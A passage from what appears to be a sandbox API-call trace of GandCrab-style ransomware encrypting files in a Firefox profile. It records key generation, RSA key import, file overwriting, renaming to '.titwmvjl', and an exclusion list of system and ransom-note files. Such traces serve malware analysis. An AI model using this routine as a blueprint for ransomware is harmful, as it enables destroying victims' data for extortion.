[0080.410] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".db ") returned 4 [0080.410] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.410] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.411] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cert8.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0080.411] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.411] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0080.412] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.412] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.413] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.415] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.416] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.416] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.416] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0080.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.416] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.416] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.416] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.416] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.419] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.419] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.419] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.419] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0080.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.420] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.420] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.420] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.420] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.423] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x5032f8) returned 1 [0080.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.424] CryptGetKeyParam (in: hKey=0x5032f8, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.424] CryptEncrypt (in: hKey=0x5032f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.424] GetLastError () returned 0x0 [0080.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.424] CryptDestroyKey (hKey=0x5032f8) returned 1 [0080.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.424] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.425] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.428] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0080.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.428] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.428] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.428] GetLastError () returned 0x0 [0080.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.429] CryptDestroyKey (hKey=0x503738) returned 1 [0080.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.429] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.429] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.429] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.429] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x18000, lpOverlapped=0x0) returned 1 [0080.443] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffe8000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.443] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18000, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x18000, lpOverlapped=0x0) returned 1 [0080.458] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.458] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.460] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.464] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.464] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.464] CloseHandle (hObject=0x2d4) returned 1 [0080.467] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cert8.db"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cert8.db.titwmvjl"), dwFlags=0x1) returned 1 [0080.468] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.468] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.468] lstrcmpW (lpString1="compatibility.ini", lpString2=".") returned 1 [0080.468] lstrcmpW (lpString1="compatibility.ini", lpString2="..") returned 1 [0080.468] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="compatibility.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini" [0080.468] lstrlenW (lpString=".titwmvjl") returned 9 [0080.468] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned 97 [0080.468] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.468] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini.titwmvjl") returned 106 [0080.468] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned 97 [0080.468] lstrlenW (lpString=".ini") returned 4 [0080.468] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.469] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".ini ") returned 5 [0080.469] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0080.469] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.469] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned 97 [0080.469] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned 97 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="desktop.ini") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="autorun.inf") returned 1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="ntuser.dat") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="iconcache.db") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="bootsect.bak") returned 1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="boot.ini") returned 1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="ntuser.dat.log") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="thumbs.db") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="KRAB-DECRYPT.html") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="CRAB-DECRYPT.html") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="ntldr") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="NTDETECT.COM") returned -1 [0080.469] lstrcmpiW (lpString1="compatibility.ini", lpString2="Bootfont.bin") returned 1 [0080.469] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini") returned 97 [0080.469] lstrlenW (lpString=".ini") returned 4 [0080.469] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.469] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".ini ") returned 5 [0080.469] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.470] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.470] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\compatibility.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0080.471] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0080.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.471] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.473] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.474] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.474] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.474] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0080.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.474] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.474] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.475] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.475] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.477] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.478] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.478] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.478] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0080.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.478] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.478] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.478] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.478] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.481] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503978) returned 1 [0080.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.481] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.481] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.481] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.482] GetLastError () returned 0x0 [0080.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.482] CryptDestroyKey (hKey=0x503978) returned 1 [0080.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.482] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.482] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.482] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0080.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.485] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503278) returned 1 [0080.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.485] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0080.485] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.485] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0080.486] GetLastError () returned 0x0 [0080.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.486] CryptDestroyKey (hKey=0x503278) returned 1 [0080.486] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.486] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.486] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0080.486] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0080.486] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0xd0, lpOverlapped=0x0) returned 1 [0080.499] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.499] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0xd0, lpOverlapped=0x0) returned 1 [0080.509] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.509] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.513] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.517] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.517] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.517] CloseHandle (hObject=0x2d4) returned 1 [0080.519] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\compatibility.ini"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\compatibility.ini.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\compatibility.ini.titwmvjl"), dwFlags=0x1) returned 1 [0080.519] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.520] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.520] lstrcmpW (lpString1="containers.json", lpString2=".") returned 1 [0080.520] lstrcmpW (lpString1="containers.json", lpString2="..") returned 1 [0080.520] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="containers.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json" [0080.520] lstrlenW (lpString=".titwmvjl") returned 9 [0080.520] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned 95 [0080.520] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.520] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json.titwmvjl") returned 104 [0080.520] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned 95 [0080.520] lstrlenW (lpString=".json") returned 5 [0080.520] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.520] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".json ") returned 6 [0080.520] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0080.520] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.521] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned 95 [0080.521] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned 95 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="desktop.ini") returned -1 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="autorun.inf") returned 1 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="ntuser.dat") returned -1 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="iconcache.db") returned -1 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="bootsect.bak") returned 1 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="boot.ini") returned 1 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="ntuser.dat.log") returned -1 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="thumbs.db") returned -1 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.521] lstrcmpiW (lpString1="containers.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.522] lstrcmpiW (lpString1="containers.json", lpString2="KRAB-DECRYPT.html") returned -1 [0080.522] lstrcmpiW (lpString1="containers.json", lpString2="CRAB-DECRYPT.html") returned -1 [0080.522] lstrcmpiW (lpString1="containers.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.522] lstrcmpiW (lpString1="containers.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.522] lstrcmpiW (lpString1="containers.json", lpString2="ntldr") returned -1 [0080.522] lstrcmpiW (lpString1="containers.json", lpString2="NTDETECT.COM") returned -1 [0080.522] lstrcmpiW (lpString1="containers.json", lpString2="Bootfont.bin") returned 1 [0080.522] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json") returned 95 [0080.522] lstrlenW (lpString=".json") returned 5 [0080.522] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.522] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".json ") returned 6 [0080.522] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.522] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.522] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\containers.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\containers.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0080.523] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.523] ReadFile (in: hFile=0x2d4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259e78c*=0x21c, lpOverlapped=0x0) returned 1 [0080.533] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.533] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.536] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0080.536] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0080.536] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0080.536] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0080.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.536] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0080.536] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0080.537] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0080.540] VirtualAlloc 